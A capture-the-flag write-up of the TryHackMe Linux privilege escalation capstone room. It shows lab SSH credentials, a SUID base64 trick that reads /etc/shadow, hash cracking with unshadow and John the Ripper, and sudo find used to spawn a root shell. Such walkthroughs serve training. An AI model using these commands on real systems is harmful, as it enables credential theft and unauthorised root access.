THM Capstone Challenge

First of all, what it may look a simple 10 min walktrhough this took me about 5h to complete with a lot try and error Priviledge Escalation techiniques. Before reading this write-up, make sure you understand all the key concepts and try to cover every technique mentioned in the Linux Privilege Escalation TryHackMe section

Let's dive in!

By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.

You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root. We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.

Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.

You can access the target machine over your browser or use the SSH credentials below.

• Username: leonard

• Password: Penny123

What is the content of the flag1.txt file?

Step 1: Look for any files with SUID or SGID bits set

We have enough privileges to get /etc/passwd but we can't do the same for the /etc/shadow.

To bypass this, we'll look for any files that have SUID or SGID bits set with the command:

find / -type f -perm -04000 -ls 2>/dev/null

The /usr/bin/base64 has an exploit available at GTFOBins

LFILE=/etc/shadow
/usr/bin/base64 "$LFILE" | base64 --decode

Step 2. Unshadow and crack the hash

Now we copy both /etc/passwd and /etc/shadow to the attacker machine and use unshadow to create a crakable file for John the Ripper:

With both files in the same directory run the following command:

unshadow passwd.txt shadow.txt > passwords.txt

And then use John the Ripper to Crack the hash:

john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt

Step 3: Login with missy and find the flag

SSH to the machine with missy credentials and get the flag under /home/missy/Documents

What is the content of the flag2.txt file?

Step 1: Enumerate the priviledges of both users

You might have noticed the under the /home directory there is a folder called rootflag, but we can't access it.

Run the command on both users

sudo -l

As we can see from the output above, not only we can use the sudo -l command with missy user, and we can even run find with sudo without specifying a password.

Step 2: Look for an exploit on GTFOBins

There is a exploit avaiblale on GTFOBins that we can use to elevate the priviledges of the current user:

Step 3: Escalate the priviledges

sudo /usr/bin/find . -exec /bin/sh \; -quit

Privildge Escalation done successfully! Now let's get that flag!

And we got it!

This was a super fun and exciting challenge. It really puts to the test your knowledge of Linux Privilege Escalation. Make sure you always take notes during your engagements, this will keep your workflow organized and help you during the enumeration process. Good luck, and remember that continuous learning and practice are key to mastering these skills. Embrace each challenge as an opportunity to grow and enhance your expertise in the field!